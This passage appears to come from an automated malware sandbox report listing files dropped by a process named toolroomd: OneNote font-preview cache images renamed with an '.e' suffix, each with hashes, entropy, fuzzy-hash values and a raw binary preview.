SHA1:	B43812A18E846F61F0B2C3401E0F8FBC1EAD26CE
SHA-256:	7468E8BC629E0C23646909685E00C60C8F152ED4E2F6782CD0E6093F047FCC8B
SHA-512:	6B505083F44E40291F6D2407EC5D32EF548F7073449286D5D67FBD0725598CE6CA671DAB797BF53144D3DDE0EB134B65A587E434AD370DAF1C2C7D72CB76872E
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.aS..\|.h..UD5..,g....>.....x.._.....eep_.t.0l}..d..L.R.....$.rF..v....!.Ho5.2Dw...n....6..L..3..M..."k%.#X.ci.D.^.Y~.I......w%N.7.KX.i..!...)"!.....Y.HU.....K..S...U.r._...:.d{.....T._c.../.KAV..5.....[.@.....@4J..a...K?<..8.C.c...V.T.........p.M1W......i..@g^...J@....0z..u..e..,.....R..3x48.p.a.>..{-.UF]k......4y./>...[..X.?j.fUCu ..pi....R..qH...[...2.P..."..vn.........m^C......G..).............h.o>..@.3.q.......X..Fm@...9.l.EV....E.....G..b[U......._P. ......}..#!...U.F!....4....w.G....Zj(.0.u.2....QNV...4.rG....^.!....g........yPj.F.3.k..e._.oq...l."viMIo.G...~.(..~..f.3..6.!.....Y..Y'+.."Oi.BN..6#t.....L0Q..5..W...V......e)..... ..O..j....dk/..v[.2f.......................5yiz;...sT.~.<.M...YL....34..@~....Y..........QF8.IK.....VVa........z.c......e....'6...^..k..U.^...8...i-.!...op...ub...!..}.{.h...!.$.^#%....9....`.....Z...x.-.....s......d(.6W... .........n?.........B..R$..5.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Maru Gothic ProNW4.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2442
Entropy (8bit):	7.746293996874391
Encrypted:	false
SSDEEP:	48:EcupxwaZ4ZsdLypaUpmtWtYftamEqg4JycXjyCox1WkNpq:hup2pQUp2Wt+3ycXiQku
MD5:	A1744F4B1635EAA947A368D667ECA3C9
SHA1:	8FDC45480172873451DE51F94460524367BF135C
SHA-256:	2803184DDD88BAC325194AEB9F81FFDD11A82A3B2A7B6DE28AF90A41CB977ECC
SHA-512:	B1D68B96F69BB6B45BB37FE077B822EF8DF997CA8626F5F2B3E68F881D2F2833FDA70469982A6CEDF70FE5EB4DA7FB8BD5124DD3ECE37BCEF0D0626815FFC6F9
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.}9.z5......F.E..../...K..-I..\|..".u%.W.E%6`..w..5N.E.7..3?h....R+.r'<.i...s..;...I-F....\......Gw....)......py..0u..0......si.............E..Td.tJ...E..A.P...)..F+.'1.p0.v.z.y.......k.....Lt.R...9.u.%a.......t.....,UF..g..V9>A....].F..Z..e.I..4.~..:L=1lKV..Mt...?.^w..n...1......^..q..Q...G..........^.w}..J..<.W.[.H.@..M[...+.....U......~.h..?..,....v...f.^...$.s.?.>..(.......14h......z.u..s.uj.Y..L`.6...%..R.L.n.....y.y...H......c..f....!...c.r.q...h...j!.....a..."......S..B:..R.?.4.c..5..N.3K\^Y..<>.LC..=....l;kS3W.....n.8..R.M4!...2.ot.\|d.>I...d......fn..:.u.I.....+.V.\.....~..&.]....nrN.T.D.D(k.i...X.A,.<.\........'......!..\......6....\|.f..+P....".2.++.."I%G=Cr..(,..H.$ujsU4ZS&b.l.rc.`B..K....JZE...#}U.P}>..e...^.a.A.....w..=......B..1..}.}.j..%y..W..~.....J.W.<c.......3...G3s..3...4.".:....-'.F......(.....v..0!/dQ.-;3..w....;......XfWqB.V..........>.'...`.......p.Va{.\|..n..[_rw..(.......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Maru Gothic ProW4.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2282
Entropy (8bit):	7.715091324287015
Encrypted:	false
SSDEEP:	48:EwTS8fC3l9YiYEs6Zpbcnt9y7awgVrjvj/mMWDD0e8W2Npq:zS8QlZs6ZZcnt9ka77j/mFQeWu
MD5:	C111AAE3F9EEEC1F48CCF348CE233F14
SHA1:	0A8A91834E5AE2548493064072F751D6E0BC10C0
SHA-256:	475C49949CC8ADE0E7E384C456BA651B0E4F22236F133C558E0F9DCDF4EF2AC2
SHA-512:	4148576B544E2FFAE989F8EC5B2C1A1956346DB00CC12ED9C68588BB71CFDA35B3203BB2FBDEE133489491A80BA2B75D632F8F7A34D2B0B381C438146A2058DC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.=.y....D...z9j...8....7..S2 -z+..n...t.g/6.Y-!.^../.s8}....t....yb..=..(D.....M...!...]..F..FY.J&CWb..>}.%a..H....lf...T-a...j.>.Z..a.... .`.a...]~..%f......(......3j...U@\......4...;{07.XR....c._.{..=.._=...P.....y.Dx....[.....NU....0....M_......V.Q.E.O.i.+@..I..`.ZI.....,Kv.r..`...Z_.....pVl m..M.F.1.X..."3B..:..#..U... .....2..o.B.._Z.`. .I...[.'......yg..!..\|..3...T6^".cy W\|..nd.N.H\...[.T..:/...f...{.X..HU.........9`.j.3.o`..\|..f.B..#N......U.g..5....<7...f.L..8UpiQ...mY.....8.......3....&J..^~PkN.....G.H...4..l..c..F..(I.u.T.~.l..1.q.x...L.r.f..`z.%P'.....+...I...4l....Tx.G8.]....0...q.....3.&........P...-..{.{psAU.U}.p..Y.e.k.)...U...P..).9)=h......9.<..v........:..8...!h.}1o.2.x?..h....[...FR.....&q(.h....J......4..6..."..].f(..=".S.Q.......)X... z........3;...R...>..O.+.x....jc...F.X.....9.&>..@?.u.c..\.WtV... !.'.....t.yX:{..........-V...F.0..Q...n,I.$.Q.{N.g..Y

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Mincho ProNW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	7.6957642202990115
Encrypted:	false
SSDEEP:	48:Ep8lZH7rVJTM5WdqoD/ZvHhnoOw8xgt5+PiXi3WguhSu+kNpq:XTH7rVVdqoD/lBn5650iQuhSlku
MD5:	709B435C9CCC7886DF2BD2E16B039791
SHA1:	FD95CA6364B14AA6A1EE664B1926A61FA7C90271
SHA-256:	F7F0B022F8CB5A7B46FC2191643B2AB5FD18CC9CDF54E1EC9A526CF98D912194
SHA-512:	6C87F85484CDD5E70180990BB88DE9C9706D2DAE4C4D8E9A1DE417417EED2B672353D6D5A4EBE8F17EDCC3CC109456C63041D6B38C1F377FA9F48240A9E2AB74
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..V.5.\...BN`...J}..p..lx.g...Q.g.QW..O..V..30i4.lcZp....L.>.....\:TJ.n...)o...%.~}8..Pf..O]...Y.....!..6..=....6..=....6..=....A.!. .\.__.*X.i..W{.Ky.c...........:e^...D.2.N..n..2G[.a..U~;s......%:.<...-A...u.C.........X..Wu../.}...0%.....J.QH......\|.......Q..f....?V.Y....,..N.^....,.....Z.yY(....t.{x"..b..8,O]...}.....[..-w..B..+.P...Iv...1.t....}Y.a.m.e..F%.#..&m"..U=.~k.#..m.../...~..b.Y^[..(.8.#.b.F\|...&..<.Vt...]Y.`3....^(.N..,~".]I..\.8......%.=.. ....P.....j..H.....xTG2..@....k..........Q.Nt...t...h..Q...L.C.a.'....3~..:.9.k-.BD.4....]......(.wq0..g..A...`3.........F.^.-.Pl.J&.z.}..................$KNr%...1Es.(..w.s...J.".e)'%...#e.9.&...U.....9...x...^..-.....1F.6.SR..2o-.+.-..Wx....i.J.oMf.?.S.6.....`..;...0.0.Y~.c.n..H..]..:z._K.......+'BX..$.f+.pB2.z..L.......(.G4..J]h......i..mh...w..E.9-.R7._.<..s..f4..a;..F.....B....5.C........CXM,......8..._.o.O.L...Q..x"9..D.vb`.+...J...z."..d@...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Mincho ProW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2098
Entropy (8bit):	7.670539754252183
Encrypted:	false
SSDEEP:	48:Eko2WBJhNdLlYhXh/DuKyQ8lVXIHh+xZUAv0sGDza9/Npq:L6VO//sQul4h+P7vtQaJu
MD5:	90C4E63F0A2A54C34586C985E03D811A
SHA1:	C55580AE673E6DB48955135A366D2AC623D4A3F7
SHA-256:	FAAEA15ECC29AD2FBB904D1BDB3ACE20A3D44BCE8F47EE76F91258328C61B50B
SHA-512:	A420A1FA3C3B455CD2D36A70602BD93E474D33813A28A0BD22018FD42737241D576A8927A46CEAD76555783B3152BD287E0520A0A6851A5FD562910417595B88
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a_\;.....&......B..0.[..b.t#:.l.......=..Sy...0..._b....9.&.D........5\|S.i;.V. 7X8.;4..q.........c........u.....u.....u.......1.h..az,..)LN..j.H.st.@H...P..............o;....d.0O...7.!..D...tp...7...wH...q.LS.g.#........$.T...j.[..-..1q..=7...0.$v}j~.Il....qr..........;o...._N.Y...Q.&..i..P.AO.6..Y.).[.V..."..uL;.%.(..wmh...kE..J...[.H..B......d.JL..i...;..%.we.V%.p......kw3.v.........(Z..M.c.y.u../.8....y0..2$_..SIu,..Z9.[c=,...1. @W'.c 0.....m..Bo%..z..m.sb.....P...".B...^...s.Y`O....\|.)....7,X...OF.f.2AJ.KDn..C.z....p.vm.h!...c..H.@O.......q[.V\|b..K.$/.B.Ep=.4.r..N%..S8........S..p%....]g..~M.....M"....x.2...........t.I..Z.6Q....(#...z..f..E.af..@..&.}....3.p.!@$.....R...).ZH....,.....0..4H.nB.`.......X.~"',Ng.........5.yU.}LW~..'$....}...VM....Aa.>.U.<9..AvbD...q.0....7.e...E.zcH......C.g.l..Qu6............v.Es.4.........*..bE..-.t,Y..."#.......I\.e.......D=z...&......p

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Sans GBW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1834
Entropy (8bit):	7.604153050273668
Encrypted:	false
SSDEEP:	48:EH5gG5APMjJakOQnBvA3zwvXs6d5kDNNNpq:C5APMdahWBv6cfs67yNu
MD5:	D277246CD298F34F70421F7988BDA66E
SHA1:	B6EF5CE111EC316668ACD695784D7DF51BC03BF5
SHA-256:	55604163A5E31024ED43E14917E420B6539621A13F17E10871C6BB3D385C8E5B
SHA-512:	C2D74CB0736507DADC17A215E9EF3B79A62798350367C22BDC5FF979EF47BBFDB75C174927C6C8938456546E44C5F2DFEA428ADFF5F4948A3B3C6B266398097C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.al,..I\|Q.3Pq....\|..k.J..P.B....[fyZ6Z.{....U...~..?>!.JM....Q.5R>...0.Hf.4...h..5...._..!!HU....g..x...-.O...z4[.....z4[.....z4[..#c.:.2.j..h...].....}=h......L.....B.7.......k...\.."R.<dO.2.,/I.x..0.o.>....T..N.....T.....\. .b..'.E..J.6_d..T..H<.<s..R.5'>.....\|.GgIl.....J....TjA.....4.9... =...[.>_@.cxy....I"k.^.\|..6 ......QtfL>..H......I.@;b..'Ri%.91{....N.T:....y...J...W.k.H.....u..0...-.i.i..Q....;..8.?P.!........+Y......y..#u~.e.@hOv....:...&...p..I...@.z.:....N....4.?....{c.w.&......gT...."=..K.m&.b..I..%..[..{..;.....ls.b...hC4...}....A..\6...I..5..d.N....?..(..a.z....w.+.L..G.;.vZu.^..o.A...k..{..-2T..{9.....i..:.....&nt.KZ.....O.v...V.uR.....Zj...\|..?fi..=;.....OOj.i........U...!....=A.s.P:}Q..p......r.pv3..=..*.k..N.U...I:.n.P...,.\.E\.L;...8&8H....3LiW....D...V..l.<..\;....'..{."......y.!.B..L.z..b.Jo.}.E....yZ....6..8Q....r<.t.$.;...M..'.e.Afd!..<......L.."..w.L........3$$Jb6...ql...]Y.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Sans W0Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1730
Entropy (8bit):	7.591092498699577
Encrypted:	false
SSDEEP:	48:EBE/hqBIJDObYqd01qVmMm53DxfNYSDLNpq:XYBGMJWYVpY1eILu
MD5:	F5432FC86CBBAB9911DD77FBD5C969CA
SHA1:	5DC9FFFF97082B3CD2CB00012A9D1AF691CBE1F1
SHA-256:	F75EB8B3C39B1A3E77CD57F5FB902C1B8801594894689139CE0241C77578BED4
SHA-512:	9C3C79590DD42ED01EF572C373C0DBDF6D5CBD1CF1AFF3D67FE124E223E154F9B461C5C2594609F4B699D9BFC12E5FBCDE926304DD9ECEF809E9F29D367C46D2
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.....i......wX13.+...Bf.......F5R...@...E..f.cO............B.........[...E..S<c..S.....v........B..97._.1..BL{.Zp.\....tp.\....tp.\....t!.v........qR.......9...Pp.n....YK;FM..?........8@Z_.-....\~V......E.]H"..1Ux....~...@..-8..1.Jp^.`:....`y3.q..\|...8M"mn..MJ.T..Owdd.W..75..#SzB.H./..\.....fa..4tK...M..\U...'4._x.Ab..pT..._.:...y.fG\|"-....{.........(....]Qi.G.....AeI.t.....9.thNh.q...V..c..=wM.D+...Cs.U....j.....y...@.W}.....(...L.....B....n..J..?{..>......?.N../...W.mL...U..b..R.t.Ub....}b.`c.!.m..x(..K.6....M....Bp!m..J..G.v.)_....jb.Z.....`.,.9.[#p....r.D.....].d..[.N69.j......k..........9ry.bn.O.U.^\|W..XD.h.M.ZL.........5.\,\|..o..U...L..0.@.V.}.q.,..6YK&.9.x....am..m..`.......%.;.-.6...Q./..nf..^.....".%...rD4.E2....W..'.=.p.Y.cjF0..x....U...n..$ox..G..`.x.F.=.j.@F..i...t....'..ci.....t..d..P..b..@....V,gm.(.W..{U....o.....aS...E\T..Y..........M...466..e...........&'.......R..H&L...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino SansW4.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1714
Entropy (8bit):	7.577510344589122
Encrypted:	false
SSDEEP:	48:EPo3irLVBK7EuX06F8R0kkdeaDt8FWo/EO1rXNpq:b32LVIH0S8R0kkwaDi/E2Du
MD5:	E95C8A47AB2E1154FD42827B477EF534
SHA1:	67DE3382A42275081E607FEDAB3819B295B8F14A
SHA-256:	AA5023E5EFDDCA7D58CC62A0FC1D63D77DD903FF76A7F9F7AFB99E08072722D0
SHA-512:	493906BC46299816678DAB67E3E604AC5D9E165D284820FFF6DC8E7556332974E381DC10F078BD7EC4EE571F0D7AB0F83999B9EA2F75A3CC6025E9F2E58315C4
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..n..#~R.[DF..,Q{..M.E..C...........U4..G\)..x~.w\|......}H..S.L}.......5...hp#...."H]......,0...ll...].av^.Q.r...S.....v..8i%S.m.....C..GG.2Qk...B.......9t....-....p..7...&.^&M,L..(.E............o7.r.W.j.. -.k.(..j.P.{..\g.>........4..l.p..\|H.p.;Y.P1.2....r.b.u......>i...5t.p...3.....h.}..L......\...2...)'M...@...L..fK..(..S..i.u...i."42y.~..jZ..U...4./...B...y.....SS]..d/....<......d..&.1.W..F[!.r9"^..=Eg.M.Pb...%....."q....X.\..5...p....p...F1,..._N.qU....O`..x$.<..q.._r..v.{...90...d..b(/g........oQ,..x....jM.f>B2...=.....r.. ..U?.....!>.J..GhR.....@....;{.B.....x...~.S..4P...\.=.]..\....xA/J./..M...0%.;k.^.....r.'...x.}S.0....@.+R.@..X;.\|...<.y.I.7......+....+.y..Q.<~.{+........&`&...S.hd...+.$.k...J..ZKS...L.....@..?....\|..P......kO}.. )....T.g.i.cP....i.5.,..3...}..br/.fFd....!A)78X....2.X.....X.D.r..Z..b..\.S.g.\|..Z..Zu..,...P..:.>..j.7..Vu-...5o....N..I....6vH.0.:.....>

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hoefler Text OrnamentsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2122
Entropy (8bit):	7.679328983970284
Encrypted:	false
SSDEEP:	48:E/bxXxcVTPvoWir1AEJOpC1CDNhrpUP8GLuh8sNpq:wb7IEWyCEuHpUP8GLuhTu
MD5:	89802D20AFADDFEA29DA29FF1576A50A
SHA1:	154F22D840031C183E294592D1FFD460BAE86B0F
SHA-256:	E28401F79EC3AC13950C57CD388308478A4E04FF77DB343E16BD9EB3F73538FE
SHA-512:	E4B1E413580E454F5B4837955073574DB0588F3CCD40F0E5897D629063FD2CD9B8B4AB0F68E2F52C6D8A33B4D3CE174CCC9EAA2DB98356288A83BA5BEDAE7C44
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a1.t.j..nhp...z3..c......e..V1.....G./I...f....uU.........PN.~_......(P...T...b..m....W..\|.....^.N)......>t..1.5.....Ve.....r.9.H.sw..[.......C..b.&...$...#\|.z.,....@p..;:.M`..,G.#.....rJ.R.`d.......[....x....lF....FD..4..........\|.a.?.K.\|dG1.....[.#G...7?...v.h..$.O...a.V....9..^..Py.:..g.....XZ......F../..&.)..{...q........ d..1".....^.h8.!..7...0....;.gA.O{6H.^......$..(5:k..vN.N/....i.b\|...R....V.R0..G..<!...,....%`@]@.sL....r....C=....G.;..w..V.T. .@.4.RT..........X...'...Ik,f./..M......bL+..'....L.W...9.o..f..&...?.u....R/~...iZ4..U.DQ.3.5^ ......._.....c.'4z.....C].b...\|.%}....<K.)...\|z<..k....x.v....#Y....fD...@...i....]\....~."J..L<.`..v.v..{.zS8.U}...=.KK).S.7.1..O.g.+O........z2.2.8.m....x......%....yea..../....v..d....W..\"..#U..:.vl..6..g.Z]..T.B..?.lu.C.]L..&N..4..E...z..5^Yu{:.,)#.IY.M.g....*.(!.....@.........-.H...Z ".[}.Og.%m.^.....#1..bN...y)[.7."Z.R....{..]....&....^0.v

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hoefler TextRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.514785341036015
Encrypted:	false
SSDEEP:	24:E/2HZywVoCz4MZZYfS4GszaEaMdFinpj6fa6DQpsqjWhoPe/xrR0NsePc0m7:EIIM8f/VanMdMnx6ffAXjWhae/tR0NNw
MD5:	A04CED02340AB71E6EA08EE2467BA2F3
SHA1:	4A9A613456E38EBD276E72535D87ED74BC283C42
SHA-256:	7D64307A4848819EE1E2583884C08F803093AB2A802A064E83A121A6F6EDA38F
SHA-512:	AFD034D21BB185A5557653B5843DAAC94032BD5E4151B5F60BF7D02CEC914DC2638BBCA56FEE8A1FACE4F7C790062F333BA3BDF22C22CF3B3C2F74F686454106
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....C........R&C.F.1.D$L..Z...Y.t.......W..o.nC.B`. ..m/...I......-.....d..7:....p<Q...$^Y.T...}.8...=..>.A..2W..b35.?.-.S.Z.m.`....\|...e..I....r....).Adl!L.B-..P...r.......g....C.o^r..7/-dns..&.x....zc...aiSH......5..<.S.<....<_N..+.\|wf.1W1..B...,..VJ..l......V......\.g.p.2dhB..?..:k.....3Z...jpRG.c....6/:J._jr.k..+.k....0.........C...>.a.<a.e....>8....&+..._..8rZ.s.,h.s..^.'t.4....7}...Y+.K..j......n_..i!.!........,<.5.^........R....X..YM`!9.bY..ix..Q.J.V...H...%!.{.pP.2e.H..b..{0.)".i...B...n..}]...J.,.b...k[.".K...;..K..e.He.TD....t..v...B....'.8.`w.O......(..$....$@..W.-..M.X..YD..i.!..K....?.N.....\|.4h...I...~.R?....+..G........It...).-$.&..[..ko.z.5..&.f.w..t.........Z......#v.......>.8...(.8..{...c.F..=..7.&T9.8...c~a"..y.$...,..TDgA.f....\|.&.P.....9.>.^...k."i..\|H..2-.........m.).E.........B.....V.8....z.s..Rk... pK...V.._...".e..~..?..oq....R<.<SDKz.A.%1=..f..2/..=S...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ITF Devanagari MarathiBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	7.672768793839937
Encrypted:	false
SSDEEP:	48:E7rDqSDHBlqErqNsJHIx2JrRteYdUfjYhN1DTMNpq:umSjbwyH68rfeYdUfjYhn/Mu
MD5:	FD8076AD6BD1785A3059E3D731F92EB1
SHA1:	58F9F8BE9C5423EA8CCB80E4B371F540BE3E3177
SHA-256:	17AA340D990A2B12686DF0A5FEDEA9FD91A258F175F7B3883FA378F5FA690558
SHA-512:	3EBAE76F32D80886ABF288CC1AA4582118BAE86D7A00F739B8E1FC1A639D57BE1842C2867FD57A3611422C44CC19909D9732900012F036368D3BD4B2255C705A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.afP...R.&..........LmW. .J..c....h0Q....=.Y....4@z._3....ao!.#I"dit.`_....zO.U......'.k:....t.l....9.{.........9...B.h.kt..B.h.kt..0d..,.....H....4..K.C...8x.s4..O..1Wa.:...(..\...N.".^t..-..H...8...2...h;........nQ.:......I.........._..lsat..&...z%j.K..8=...h.VH.f:..._wd...K...!.{3\YQ.n..........lz...v.#L.n..kd.\|3"R.2'Z..Y`.........D..!.7......v...6.>..;.mX_cZ.4=oM=.'d..V..~u.&.h"..V.`.......E,......X..0.nx$Nh.lSS2.5O.(/.s...&...!..K..a.s.5.[.EP.$.F....S#.UII..@.uDt<.G........ ...n<...~..y.'.+..<.........P.vf..n.8+{- ..n.`...J....@..9Bjt....LqMq..(%.3.[.o..cN.....w.b.o.C._7........dY.._..e.Pj.k6.?.0uo..i....q...!.#..\....b?.....*4..}...~<....."...z..^Zr.=..?.Z.XU.VI...h.d....1.M..t...9.gIc.S.Y..^l.iw.'^.:...P.R.....,A.......1..W.....L.... ....)...^..b..7..MJE...v....#}.7.L......-....5......P......l........JM....z2..rm....y........QJ.;.........t.p.^3.>tT.M..q.....j..E..7v8.x..y..%.....:...H...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ITF DevanagariBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.513417383265788
Encrypted:	false
SSDEEP:	24:ElCRgKREPnsqXCMk0Z8xIGazHQ22SAKuYfBucoqerI8U6KKeBMhjIzsePc0m7:EligKREjk0KOGazJ2SYYfYcorrI8ULzg
MD5:	761B1B1700F8CC972E5F7A2AED23EC43
SHA1:	24BBFFC05751BE6F7EE61F69EA48675CBA937841
SHA-256:	6C51F4870C82599E3351A29C7C7267DD9B95D99B38FEB0F1E11F97F6A8FDAF2E
SHA-512:	01144B78CD07C4979AAAC5652E94E6DA77222CD98C1FF6C9EE9C11126F16C76E961D506F6A542A7A352A2C52F94546A5236858E1C0FF4AD54035FD3CE0D3346B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....C...T..Z....rP.!..'....{.Rt.;.....w.C..8....~u..9.o.....p."..u..i..]Y..,......e v.}.....j~S..Vl.C..i.6\|.8.Q'\|aU......[F~...&.....X....@1..T...U..k.nh.<+.{i.....A.h4#z.LN.d.7.A.....~.......J..of.../......BgB.0.'...9..Tbg.DM..I.P.j=..7\.8,W..>.uB......]..6.h.U....G_....%./.Y..@.`......Nb..e=)..T...."....b.j....?.v$k3. .....BO{.....2..{3.]j.].._.q..q..8...-......0...;....'6.'.........;..,.w>.d.l....$.x#......m..R.w........9...Y...n..{...wj..ku.......v.....lmh.v..0..Q..9.D..^............X..wXCl.G...#.W:..=.8jC%2.A.a..g.....{.h.p.<<.\|o-%.......v.Cw..++.a.TM.f..r.)..=.t}..B<...m6.....X...F(.................,8R.....<t..?..7..&P....&......a.~.....Y..*6......J.......L.....Q..%..7.."(Q... ..IO...I..L.Cu..../%.f..d5!."..q..g#yA...p..B..>.>j.Rx Cu0..q.ct.#.B.....Q..0...K.u8\.....X...^$1...x..d...t....%.G.m(5.P..t.m.I..HBd(I\..yg.w)7..q.p....I.p........e.....#...X.....8G..Z.8.E.Y&.....N.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ImpactRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.1948183006169675
Encrypted:	false
SSDEEP:	24:EJsyt2DubVerl8AKi9D0uY3JwYoy6cGGsePc0m7:EJS5IN3yxcGGNpq
MD5:	26F9FB6B9DE0D711243F7E64CFD95363
SHA1:	E9E30244233717F4481338753396E6B4DD678CE4
SHA-256:	0652F38D55BF1BBE8B61A3D6735D1DB787631451FB7582F8089C83A1D9A3E7B6
SHA-512:	02279BF1688FAEF4F2F0AF4843EE340B7D413C93C2E7DE54D5909098AB937D95241A9D00B0C40B1BF0A3D108C1E7B3332C33B47A4936AF12F74BEEA9404D797C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aS.,A.7g:...[.u.H.......E....(.y..H...!.=67..G...=..W.c.@[2g#.=W.H...u.h.....Y.eH...8...;.q8.......P~#2R-.-5"s..}m...[g.....P8...L..Fn?S.H~.....W608E..Q....s.1h.N......s.h..F..-..%..i..V.ClZ.M...Z....[`...[#a.x....;.......h:p..&. .u.._Nk`.....^.yx..G.da.m.=..a3..'q.\|....S&P.'H.........5.w..s4"m.......Y..x..u....PJ...K.'"..v...c..w.M.%....E..3/Re....r.h.(.[9.6......M....NBX...b.^.X.%.c..tBl....4^.s...ZO.3.T.%...w.R...m.x.v..............KJ.K.... ..).W.9...\|.K......%...[P..........r6..v6....L...Y...f.03.(q...qJ...PM.,..Qf..Y..H...+......Y.h... yv.......jt........t..V.u...Uv.PEq.....F.~B..r-\|......p.).s.-.".1...H..'.;.-.....Kf.V.4..oF.U.!..Vh. =......................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.InaiMathiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1226
Entropy (8bit):	7.375024554995501
Encrypted:	false
SSDEEP:	24:Epc1mrAe/lB+2IiVM1vZIdjR0yMy0+IutRDsePc0m7:EO1mPB+bi+5qMyMyHTDNpq
MD5:	B2F798A1F3B5593E22C5694D0AEFC9C9
SHA1:	E9188365B2C22CB3B9E9BBE48DCF12C7A76EE14D
SHA-256:	AD5AF3AD472660ADCCECA0DB33975CEF66CE1586A55E3160A51AE84C3142D022
SHA-512:	32CE4EC095C13A7D1B1FAE047E2BDC03FBF93E9E3EFD28BB1028CB652FC82FC46A09899BA25198BC3F72C22FBE862DA3E1EC14FE46B61C6FF49B0B8C066EE109
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.U.}...vU@G.e.......yS.....x.`,:/o...y...E~.0..yU.N}+].`Tp..V6.....C.C.Mc.:9Qw....>FE.m....2Wy.r?.cF.............Z...R.n.CW'.........,..AU......$H..[.6.....h.A.`N`..IbJ.O.xL7.(G....0.Wq.}...'....."..hv.=F.1...........3..'.B.@4..-..8...W&.......y..(l..3.)....xq...S..%....(..!....5...0.=)O%..:.t.6t..I.Q...?.4.F.<g.....\|0...@.....N}......g.E.S.#8....Z..r..A..U..f.....&..>.D.rH..{.....p<TL.....Y.s.H.C.. K..Cn0.r.D..!uP_O.....V.H.f.\.E.<.(.Z.e.I........:........E~..._.#..#...5,4E..W..O.O....(..j.1.U.t)j..z%X.. .ah..m.....Nl....}.@<N.E9.ia....,.o..md...8..!.....w=.2...a..t...c..._...R..0Z5.q..!.l,..n...v..[".kj.L.h..j..o....-K?....!........P..m...,.,..p......ft.{./..%..[...^.;...!<m}.K.s..~^.k..7...4m.b.. ..!Z.Xj.M9..X...b..m........n.{.I..N.iz...i.<.......e/.....<.mUc.../................0l.+..Z^.....`.A++%..?.G.x......................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Iowan Old Style TitlingRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2322
Entropy (8bit):	7.714563237609635
Encrypted:	false
